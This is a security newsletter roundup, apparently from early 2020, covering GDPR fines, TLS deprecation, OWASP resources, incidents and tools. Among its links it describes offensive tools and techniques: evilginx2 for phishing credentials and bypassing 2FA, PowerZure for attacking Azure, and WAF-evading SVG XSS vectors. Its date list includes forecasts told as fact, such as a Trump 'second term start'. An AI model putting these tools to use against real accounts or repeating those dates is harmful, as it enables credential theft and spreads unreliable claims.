Security Stack Sheet #83

Word of the week

“The Lift-and-Shift Dragon”

The Definitive Guide to Cloud Migration in the Enterprise: Here Be Dragons!

The most common (and most deadly!) of the dragons goes by the name of Lift-and-Shift.

The Lift-and-Shift Dragon emerges when you take your existing data centre workloads and move them to the cloud without any changes.

This dragon rears its ugly head when the leadership decrees that you must adopt the cloud…and that’s about it. In the face of tight deadlines and a back-of-a-napkin strategic vision your teams inevitably attempt to get to the cloud in the quickest, bluntest and most efficient way possible. Lifting and shifting your workloads, as they are, into the cloud is without doubt the fastest way to get to the cloud, and showing fast progress is attractive. However this approach is quick only in the sense that driving straight across pavements and through red lights is the ‘quickest’ way to get to work. Both result in disaster

Link HERE

 

Bonus

A close up of a logo Description automatically generated

A screenshot of a cell phone Description automatically generated

Link HERE

Link HERE

A screenshot of a cell phone Description automatically generated

Link HERE

A screenshot of a cell phone Description automatically generated

Link HERE

IRpair & Phantom – Privacy Eyewear

Sunglasses designed to block Facial Recognition & Infrared Radiation.

Link HERE – thanks to Naz

A screenshot of a cell phone Description automatically generated

Link HERE

A screenshot of a cell phone Description automatically generated

Link HERE

A screenshot of a cell phone Description automatically generated

Link HERE

A screenshot of a cell phone Description automatically generated

Link HERE

Crypto challenge of the week

Compromise a web server running WordPress, obtain a low privileged user and escalate your privileges to root using a Python module

Link HERE

 

Dates

  • May 25th 2018: Almost 2 years of GDPR Live! See incidents section below GDPR Enforce Tracker Link HERE – thanks to Marius

DLA Piper GDPR Data Breach Survey 2020

Over 160,000 data breach notifications have been reported across the 28 European Union Member States plus Norway, Iceland and Liechtenstein since the GDPR came into force on 25 May 2018.

  • France is the country with the highest total amount of fines during the period… far ahead of Germany and UK (UK figures do not yet count for the 2 public notice of intent to fine £282 million as they had not been finalized and imposed at the time of writing of the report)
  • Austria, while a small country in terms of citizens, shows up at the 3rd place

A screenshot of a cell phone Description automatically generated

Link HERE – thanks to Christophe

  • 1st January 2020 – The California Consumer Privacy Act (CCPA) becomes effective Link HERE
  • Now: TLS1.2 mandatory for proper security HTTPS everywhere HERE
  • DO NOT DELAY TLS1.2 migration LATER THAN JUNE 2020 or A FEW THINGS WILL STOP WORKING!

[Browsers, Office365, Cisco and many others]

  • January 2020 – Qualys SSLLabs will rate your TLS1.0 setup as B – Qualys will de-grade you HERE DONE

Update 1/31/2020: The grade change is now live on www.ssllabs.com. Servers that support TLS 1.0 or TLS 1.1 are capped to B grade.

  • June 2020 – Microsoft plans to deprecate TLS versions 1.0 and 1.1 in Office 365 and Office 365 GCC – HERE
  • 31st of January 2020 – Brexit DONE

Source comic book: V for Vendetta

  • November 3rd 2020: Trump’s second term start

Did the Saudi Crown Prince really hack Jeff Bezos’s phone?

Link HERE and then Facebook blames Apple for the hack HERE

  • 2022 – First trip to Mars according to Elon Musk
  • 2023 – 3DES is deprecated for all new applications and usage is disallowed after 2023 HERE
  • 2024 – Back to the Moon according to Trump and NASA

Book of the month

The Cybersecurity Playbook: How Every Leader and Employee Can Contribute to a Culture of Security by [Cerra, Allison]

Link HERE

Uncanny Valley

The truth is always messier, more interesting and more human. It is a central tension animating Anna Wiener’s excellent memoir, “Uncanny Valley.” The book traces Wiener’s navigating the tech world as a start-up employee in the mid 2010s — what might be thought of as the last years before Silicon Valley’s fall from darling status. Wiener said she was drawn into the tech world by its propulsive qualities. Graduating into a recession and spending her early 20s in publishing, tech offered opportunities: jobs, the seductive feeling of creating something and, of course, the money was good.

But what makes “Uncanny Valley” so valuable is the way it humanizes the tech industry without letting it off the hook. The book allows us to see the way that flawed technology is made and marketed: not by villains, but by blind spots, uncritical thinking and armies of ambivalent people coming into work each day trying their best — all while, sometimes unwittingly, laying the foundation of the surveillance economy.

From a privacy standpoint, “Uncanny Valley” is helpful in understanding what it’s like being on the other end of the torrent of information that streams from our devices each minute. Early on, Wiener recounts working for a successful data analytics company and the gold rush toward big data, noting that “not everyone knew what they needed from big data, but everyone knew that they needed it.”

When confronted with the mass of information her company collected, Wiener describes feeling uncomfortable with the “God Mode” view that granted employees full access to user data. “This was a privileged vantage point from which to observe the tech industry, and we tried not to talk about it,” she writes. This, she notes, becomes a pattern. When Edward Snowden blew the whistle on the National Security Agency’s Prism program in 2013, employees at her own data company never discussed the news

Link HERE

Interview with Jim McKay

During the Solothurn Film Festival 2020 we had the opportunity to meet Jim McKay, who directed, among others, two episodes for Mr. Robot season one. Jim had also time for a short interview

“I love hacking can be used for the greater good.”

Link HERE

Comic of the week

Looks Like A Duck - Dilbert by Scott Adams

##Some OWASP stuff first

-SAMM release v2

The new SAMM release v2 consists of the following components:

  • The SAMM Model overview and introduction, explaining the maturity model in detail;
  • A Quick-Start Guide with different steps to improve your secure software practice;
  • Updated SAMM Tool Box to perform SAMM assessments and create SAMM road maps;
  • A new SAMM Benchmark Initiative to compare your maturity and progress with other similar organizations and teams

Link HERE

-AppSec Podcast – DJ Schleen — DevOps: The Sec is Silent

DJ Schleen is a seasoned DevSecOps advocate at Sonatype and provides thought leadership to organizations looking to integrate security into their DevOps practices. He encourages organizations to deeply integrate a culture of security and trust into their core values and product development journey.

DJ joins us to talk about the philosophy of DevOps and flow, DevSecOps and silos, and the DevSecOps reference architectures. We hope you enjoy this conversation with… DJ Schleen

Link HERE

-OAuth and OpenID Connect: Security Best Practices

Link HERE – thanks to Mike

-Improve Your Secure Score in Azure Security Center

Link HERE

-OWASP Top 10 Proactive Controls latest by Jim Manico

Link HERE

-What’s new and exciting about the ASVS 4.0

Link HERE

-Remember: Developer’s Guide to Common Vulnerabilities and How to Prevent Them

Link HERE

-SVG animate XSS vector

As part of my recent research into obfuscating XSS payloads to bypass WAFs, I was looking at the SVG elements set, animate, animateTransform and animateMotion. I added a couple of known XSS vectors to the cheat sheet using those tags. Then focusing on the animate tag I found an interesting XSS vector using the values attribute

Link HERE

-Remember: CSV Injection

Link HERE

 

Events

OWASP events HERE

All InfoSec events HERE

AppSec Cali 2020

Slides HERE

An Opinionated Guide to Scaling Your Company’s Security

Link HERE

[tl;dr sec] #22 – Post AppSec Cali, K8s Security Monitoring at Scale

DevSecOps talks & tools from AppSec Cali, PoCs to decrypt WhatsApp messages, Kubernetes monitoring and CTF, Python static analysis tools

Link HERE

GitHub Security Meetup – Jan 22, 2020 – San Francisco

Link HERE

Application Security in the Age of Cyber War

A close up of a flower Description automatically generated

Link HERE

Cyber ​​News TV

The International Cybersecurity Forum (FIC) team launches Cyber ​​News, a new TV, web and radio media entirely dedicated to cybersecurity. The idea: to aggregate cyber contents – of various formats and sources – to better inform and raise awareness on digital security issues

Link HERE

The Lawfare Podcast: Renee DiResta on Disinformation and Misinformation From Vaccines to the GRU

Link HERE

Webcast – Designing a Secure Microservices Architecture

A screenshot of a cell phone Description automatically generated

Link HERE

 

Incidents

Global ALERT level

cid:<a href=[email protected]″>

BLUE or GUARDED indicates a general risk of increased hacking, virus, or other malicious activity. The potential exists for malicious cyber activities, but no known exploits have been identified, or known exploits have been identified but no significant impact has occurred. 

Incident data HERE Find your country

A close up of a map Description automatically generated

NCSC Weekly Threat Report

Provided Image 

Citrix release patches to fix product vulnerability

Patches which fix a vulnerability in the Citrix Application Delivery Controller (ADC) and Citrix Gateway have been released.

We reported on the security issues earlier this month and also published an alert offering mitigation advice to those affected by the vulnerability. That alert has now been updated to version 2.0 and carries the relevant links to the released fixes

Cyber security measures being considered ahead of Japan 2020

Ahead of the 2020 Olympic and Paralympic games, a panel of experts in the Ministry of Internal Affairs and Communications in Japan has proposed a set of emergency measures to strengthen cyber security defences

UK decision on high risk vendors

This week the government announced that new restrictions should be placed on the use of high risk vendors (HRVs) in the UK’s 5G and gigabit-capable networks.

As part of the Department for Digital, Culture, Media and Sport’s (DCMS) Telecoms Supply Chain Review, the NCSC carried out a technical and security analysis of what is needed to protect the UK’s digital infrastructure

Link HERE – Report Vulns to NCSC HERE

API Security Issue 68: API security in Gartner Hype Cycle, McAfee threat predictions for 2020

Link HERE

Troy Hunt Blog – Issue 176

Link HERE

Unsupervised Learning 213

Link HERE

Incidents & events detail

Hacker leaks passwords for more than 500,000 servers, routers, and IoT devices

The list was shared by the operator of a DDoS booter service

Link HERE

YouTube tackles trolls with Profile cards, comment history records

The testing period is over and Android users will soon be able to check commenter logs

Link HERE

WordPress plugin vulnerability can be exploited for total website takeover

The “easily exploitable” bug in WP Database Reset has serious consequences for webmasters

Link HERE

Zoom Fixes Video Conferencing Vulnerability

Zoom has fixed a flaw in the its video conferencing tool’s URL scheme that could have been exploited to eavesdrop on meetings. Prior to the fix, Zoom meetings did not require passwords by default, which means that anyone who guessed the meeting ID number could join. Zoom learned of the issue in July 2019 and fixed the issue: passwords are now required by default for all scheduled meetings. Zoom made other security enhancements as well.
[Neely]
Zoom also has a setting to lock a meeting in progress so that others cannot join, which could be useful when having sensitive conversations

Link HERE

Microsoft Issues Excel Security Alert As $100 Million ‘Evil Corp’ Campaign Evolves

Link HERE

A Less Known Attack Vector, Second Order IDOR Attacks

Link HERE

Trello exposed! Search turns up huge trove of private data

Link HERE

Remember: Capture NTLM Hashes using PDF (Bad-Pdf)

Link HERE

How the most damaging ransomware evades IT security

Image

Link HERE

FireEye Acquires Cloud Governance Firm Cloudvisory

Link HERE

Research of the week

Featuring – Upcoming Browser Behaviour Changes: What Developers Need to Know

Learn about upcoming changes to browser cookie behaviour that may make your web applications incompatible.

What Might Be Affected?

Here’s a list of the scenarios that are most likely to be affected by the changes:

-Integrations with Identity Providers using protocols such as SAML 2.0 or OpenID Connect.

-Embedding web application content from a third-party domain.

-Querying APIs from a third-party domain.

Web Application Sign-In using Identity providers after changes

Note: this is not an exhaustive list

Link HERE

Attacking Azure, Azure AD, and Introducing PowerZure

Over the past decade, Azure’s presence in businesses has grown significantly as new features and support were added to Azure. The purpose of this article is to cover three main points:

  • Explain the components of Azure and how they fit into a modern IT environment.
  • Explain how certain things within Azure can be leveraged from an offensive perspective.
  • Introduce the PowerZure project and explain how it helps offensive operations against Azure.
    https://github.com/hausec/PowerZure

Link HERE

Open-Sourcing riskquant, a library for quantifying risk

Netflix has a program in our Information Security department for quantifying the risk of deliberate (attacker-driven) and accidental losses. This program started on the Detection Engineering team with a home-grown Python library called riskquant, which we’ve released as open source for you to use (and contribute to). Since that library was written, we have hired two amazing full-time Risk Engineers (Prashanthi Koutha and Tony Martin-Vegue) who are expanding rigorous quantified risk across the company.

The Factor Analysis of Information Risk (FAIR) framework describes best practices for quantifying risk, which at the highest level of abstraction involves forecasting two quantities:

  • Frequency of loss: How many times per year do you expect this loss to occur?
  • Magnitude of loss: If this loss occurs, how bad will it be? (Low-loss scenario to high-loss scenario, representing a 90% confidence interval)

Link HERE

Fuzzing software: common challenges and potential solutions (Part 1)

In this two-part blog series, we’ll review some of the challenges we commonly face in our fuzzing workflows and provide ways to address these challenges. We’ll also discuss a variety of fuzzing methodologies and strategies that can improve our results.

As a practical example we’ll use vulnerabilities we found in VLC Media Player through our fuzzing efforts with the AFL and AFL++ toolchains

Link HERE

Tool of the week

Kali Linux 2020.1 Released!

Kali Linux 2020.1 Released

Link HERE

Delivering origin-bound one-time codes over SMS

End users shouldn’t have to manually copy-and-paste one-time codes from SMSes to their browser.

Sites should be able to trust that the one-time codes they send over SMS will only be entered on the originating site

Link HERE

Introducing Microsoft Application Inspector

Link HERE – thanks to Jachar

Link HERE

evilginx2

man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows to bypass 2-factor authentication protection

Screenshot

Link HERE

Two Factor Auth (2FA)

List of websites and whether or not they support 2FA

Image

Link HERE

This New Facebook Tool Reveals How You Are Being Tracked Online

A screenshot of a cell phone Description automatically generated

Link HERE

Use TypeScript to Create a Secure API with Node.js and Express: Getting Started

Link HERE

Syntribos – Python API security testing tool

Syntribos is an open source automated API security testing tool that is maintained by members of the OpenStack Security Project

Link HERE – thanks to Alvin

Other interesting articles 

##5 Steps to Implement DevSecOps

  • Security teams are not growing proportionally to the tools they purchase. And…
  • Cryptographer Bruce Schneier was right: Security tools don’t make us more secure, processes do.

Link HERE

##Combining AI and Playbooks to Predict Cyberattacks

Link HERE

AND

MTTD and MTTR: Two Metrics to Improve Your Cybersecurity

Link HERE

 

##Goodbye, Clean Code

My colleague has just checked in the code that they’ve been writing all week. We were working on a graphics editor canvas, and they implemented the ability to resize shapes like rectangles and ovals by dragging small handles at their edges.

The code worked.

But it was repetitive…

Link HERE

 

##And finally, Robotics and AI will create millions of jobs by 2030 and we barely know what they are yet

No alt text provided for this image

Link HERE

##HACKING, TOOLS and FUN – CHECK BELOW!

AppSec Ezine

Must see

URL: https://lapcatsoftware.com/articles/Safari-runs-disabled-extensions.html

Description: Safari runs disabled extensions.

URL: https://nathandavison.com/blog/exploiting-email-address-parsing-with-aws-ses

Description: Exploiting email address parsing with AWS SES.

Links HERE and credits to HERE

 

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *